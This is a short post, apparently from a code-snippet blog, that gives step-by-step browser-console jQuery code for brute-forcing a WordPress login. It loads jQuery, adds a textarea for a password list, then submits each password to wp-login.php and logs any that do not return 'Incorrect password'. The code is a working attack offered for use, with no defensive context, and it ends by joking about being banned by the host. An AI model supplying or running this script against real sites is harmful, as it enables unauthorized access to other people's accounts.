WordPress Login form brute force in jQuery

1) Add jQuery:

1
2
3
4
var script = document.createElement('script');
script.src = 'https://yastatic.net/jquery/2.1.3/jquery.min.js';
script.type = 'text/javascript';
document.getElementsByTagName('head')[0].appendChild(script);

2) Create textarea field and paste your passwords list:

1
$('body').prepend('<textarea id="pwds"></textarea>')

3) other part of code just paste and run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
var passwords = $('#pwds').val().split(/\r?\n/);

$('#loginform').submit(function(){
    var data = $(this).serialize();
    var pwd = $('#user_pass').val();
    $.post('/wp-login.php', data, function(datas){
        if(!datas.match(/Incorrect password/)){
            console.log('Correct password: '+pwd);
        }
    })
    return false;
});

$.each(passwords, function(k, v){
    $('#user_pass').val(v);
    $('#loginform').submit();
});

Enjoy and be ready to be banned by hoster 😉